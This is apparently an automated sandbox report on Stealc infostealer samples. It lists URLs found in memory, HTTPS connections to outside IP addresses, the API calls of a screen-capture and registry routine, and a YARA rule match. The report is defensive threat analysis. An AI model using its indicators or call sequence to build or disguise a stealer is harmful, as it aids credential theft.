                                  Source: legs.exe, 0000000A.00000003.2420888831.0000000003D33000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2433707389.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2421064655.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2433933056.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2434381085.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000003.2519730280.0000000009784000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000845000.00000004.00000001.01000000.0000000D.sdmp, gold1111111111.exe, 00000013.00000003.2521676676.0000000005C6F000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2522813093.0000000005C68000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2534582940.0000000005C68000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2535287105.0000000005C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000845000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                                  Source: legs.exe, 0000000A.00000003.2421064655.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2522813093.0000000005C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                                  Source: legs.exe, 0000000A.00000003.2420888831.0000000003D33000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2433707389.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2421064655.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2433933056.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2434381085.0000000003CE7000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000003.2519730280.0000000009784000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000845000.00000004.00000001.01000000.0000000D.sdmp, gold1111111111.exe, 00000013.00000003.2521676676.0000000005C6F000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2522813093.0000000005C68000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2534582940.0000000005C68000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2535287105.0000000005C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                                  Source: legs.exe, 0000000A.00000003.2421064655.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2522813093.0000000005C43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000845000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/badges/package/pypi/importlib-metadata
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-importlib-metadata?utm_source=pypi-importlib-metadata&utm
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2779787225.000002103D991000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764071442.000002103D950000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773075995.000002103D990000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785024324.000002103D996000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103D963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784511291.000002103DFA9000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2788433493.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785362407.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2778318404.000002103DF70000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774888505.000002103DF70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2786528925.000002103DF65000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764899734.000002103DA38000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785200465.000002103DA3D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785496776.000002103DF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2788554888.000002103D942000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784009746.000002103E0F6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773693170.000002103D936000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764229732.000002103D92F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2766392868.000002103D936000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784431954.000002103D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2806006559.000002103E7E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2806408945.000002103EAF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#socks-proxies
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805888391.000002103E6A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2726511930.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2726511930.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wheel.readthedocs.io/en/stable/news.html
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2777953270.000002103D8E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775297088.000002103D8E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770927694.000002103D8E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779753706.000002103D8F6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2736144327.000002103D937000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2782256764.000002103D907000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2736144327.000002103D8F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
                                  Source: legs.exe, 0000000A.00000003.2487012377.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2473876275.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2485712460.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2496864884.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2612262377.0000000009902000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2549807905.0000000005C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2718440554.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2718557145.000001FE20963000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2718440554.000001FE20962000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2718440554.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE2095F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                  Source: legs.exe, 0000000A.00000003.2420059499.0000000003CDB000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420252835.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420156867.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514233057.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514356600.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.entrust.net/rpa0
                                  Source: legs.exe, 0000000A.00000003.2473841849.0000000003CA0000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2606844881.0000000000F2C000.00000004.00000020.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2612262377.0000000009902000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2549807905.0000000005C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                                  Source: legs.exe, 0000000A.00000003.2420059499.0000000003CDB000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420252835.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2420156867.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514233057.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2514356600.0000000005C5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2798174482.000002103D86C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2801345249.000002103D86C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2788204551.000002103D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000814000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                  Source: gold1111111111.exe, 00000013.00000003.2549269233.000000000603B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000814000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000814000.00000004.00000001.01000000.0000000D.sdmp, stealc_valenciga.exe, 0000000B.00000002.2605733267.00000000008F7000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.00000000008F7000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
                                  Source: gold1111111111.exe, 00000013.00000003.2549269233.000000000603B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000814000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                  Source: legs.exe, 0000000A.00000003.2473201087.0000000003DBB000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000003.2591268769.0000000009B6F000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2549269233.000000000603B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                  Source: gold1111111111.exe, 00000013.00000003.2549269233.000000000603B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000814000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                  Source: legs.exe, 0000000A.00000003.2473201087.0000000003DBB000.00000004.00000800.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000003.2591268769.0000000009B6F000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2549269233.000000000603B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2605733267.0000000000814000.00000004.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2816918875.00007FFE02D1A000.00000002.00000001.01000000.00000023.sdmp, client_jackbastadguy.exe, 00000017.00000002.2810547911.00007FFDFB667000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: https://www.openssl.org/H
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2776999972.000002103E00F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2790443253.000002103DEF0000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803179756.000002103DEF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2716463131.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2801243888.000002103D760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2726511930.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0427/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2731861704.000002103D56F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2731996714.000002103D581000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2800301838.000002103CD50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785496776.000002103DF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2777680443.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2805065822.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774888505.000002103DF6D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2787855784.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784009746.000002103E0F6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781952523.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776999972.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772329883.000002103E012000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787345849.000002103E0F7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49818 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49826 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49837 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49848 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49861 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49866 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49883 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49898 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49910 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49913 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49931 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49934 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49945 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49955 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49974 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:49988 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 172.67.156.127:443 -> 192.168.2.4:50004 version: TLS 1.2
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeCode function: 8_2_006961F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,8_2_006961F0

                                  System Summary

                                  barindex
                                  Malicious sample detected (through community Yara rule)
                                  Source: 11.0.stealc_valenciga.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
